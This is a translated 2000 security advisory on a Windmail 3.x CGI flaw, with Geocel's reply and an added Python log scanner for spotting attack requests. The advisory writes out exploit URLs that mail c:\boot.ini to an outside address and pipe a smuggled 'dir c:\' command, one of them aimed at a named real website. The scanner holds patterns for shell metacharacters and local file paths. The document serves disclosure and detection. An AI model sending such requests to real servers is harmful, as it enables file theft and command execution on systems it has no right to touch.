
Windmail CGI Vulnerability

2000-05-20 00:00 Author: frankie Source: CPCW Editor:

Affected program
Windmail 3.x by http://www.geocel.com/

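Description
CNNS Security Advisory 2000-05 / CNNS found that Windmail allows users to execute commands with the web server's identity and to steal files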

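Details
WindMail is a 32-bit Windows application that lets users send mail from the command line.
The software is developed by Geocel; a trial version can be downloaded from http://www.geocel.com/download/wmail301e.exe
Windmail can send mail through a CGI interface and also supports HTML mail-sending forms. We recently found that many servers (it is fairly widely used in China as well) have the windmail.exe program in their cgi-bin directory. PP, a security engineer at this site, analyzed the program and found that this CGI program allows anyone to read files on the local hard disk and also allows users to execute arbitrary commands as the web user:
http://www.xxx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20yourmail@mail.com%20|%20dir%20c:\
This request causes windmail.exe to send c:\boot.ini to yourmail@mail.com and then execute the command "dir c:\".
As evidence, take one foreign website:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%20aggressor@163.net
This will send c:\boot.ini to chinahack@xxx.net
In addition, Windmail.exe does not check its command arguments: it accepts special characters such as the pipe character, which may be followed by a command string to execute.
This vulnerability was tested successfully on windmail 3.05.
With this site's authorization, Securityfocus, the world's largest network security database, has published the finding on their website:
http://www.securityfocus.com/bid/1073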


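Solution
We have notified the vendor, http://www.geocel.com/, and they responded, but they believe the problem lies with the system administrator and that there is no need for them to fix the vulnerability.
We believe that since windmail claims to provide a CGI interface designed for web applications, it should check for special characters and validate its command-line arguments.
We recommend not placing windmail.exe in a web (executable) directory.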
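
A way to check web server logs for the condition described above, as an added example that is not part of the original advisory. It assumes Common Log Format; the sample log lines, IP addresses and mail address are constructed.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/[\d.]+"')
# Shell metacharacters, which the advisory says windmail.exe does not check.
SHELL_META = re.compile(r'[|&;<>`^]')
# A command-line switch such as "-n" at the start of the query or after whitespace.
SWITCH = re.compile(r'(?:^|\s)-[A-Za-z]\b')
# A local Windows path (drive letter) or a parent-directory traversal.
LOCAL_PATH = re.compile(r'[A-Za-z]:[\\/]|\.\.[\\/]')

def classify(line):
    """Return the findings for one access-log line ([] if it is not relevant)."""
    m = REQUEST_RE.search(line)
    if not m or not m.group("path").lower().endswith("/windmail.exe"):
        return []
    # Decode twice so double-encoded input (for example %257C) is also caught.
    query = unquote(unquote(m.group("query") or ""))
    # Any hit at all means the binary sits in an executable web directory.
    findings = ["windmail.exe reachable as CGI"]
    if SWITCH.search(query):
        findings.append("command-line switch in query")
    if LOCAL_PATH.search(query):
        findings.append("local file path in query")
    if SHELL_META.search(query):
        findings.append("shell metacharacter in query")
    return findings

def scan(lines):
    """Map 1-based line number -> findings for every line that touches windmail.exe."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample log (documentation IP range, placeholder mail address).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2000:10:00:01 +0800] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.11 - - [20/May/2000:10:00:05 +0800] "GET /cgi-bin/WINDMAIL.EXE'
    '?%20-n%20c:\\boot.ini%20user@example.com%20|%20dir%20c:\\ HTTP/1.0" 200 0',
    '192.0.2.12 - - [20/May/2000:10:00:09 +0800] "GET /cgi-bin/windmail.exe'
    '?-n%20c:%5Cboot.ini%20user@example.com HTTP/1.0" 200 0',
    '192.0.2.13 - - [20/May/2000:10:00:12 +0800] "GET /cgi-bin/windmail.exe HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, "; ".join(findings))
```

A line that reports only "windmail.exe reachable as CGI" still matters: it shows the binary is being served from an executable directory, which is the condition the recommendation above removes.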

This is Geocel's reply:

-----Original Message-----
From: Ben Camp <benc@gallerywatch.com>
To: frankie@CNNS.NET <frankie@CNNS.NET>
CC: pp@cnns.net
Date: March 28, 2000 23:56
Subject: windmail bugtraq

This is in your numbering system.

1. Thanks for letting me know this got all the way to bugtraq. pp@CNNS.NET
decided to ignore any responses to his earlier message.

2. I certainly do not have a problem with correcting any problems, but I'm
not seeing the security problem here with WindMail. It seems to me that
if you make all your files world-readable or run an environment in an
administrative user context (NT Administrator/root) then you cannot blame
individual utilities that function according to the security constraints
you put them in.

"Workaround: Set up the webserver to run under an account that only has
read access to files that are meant to be publicly accessed".. Is this a
workaround, or what one should do before they start blaming tools that have
no control over the matter? He also has this in his cgi-bin directory
which would let the webserver execute it directly instead of in the default
installation directory outside of the web root.

So here are my questions so we are clear:

1. If you have (mis)configured your machine to allow read access to all
files, then how is this a problem with WindMail?

2. What is WindMail doing that it should not given the security constraints
it is under?

3. What are your recommendations for how WindMail should act differently
and under which circumstances?

Thanks,
Ben Camp
benc@geocel.com
Geocel International
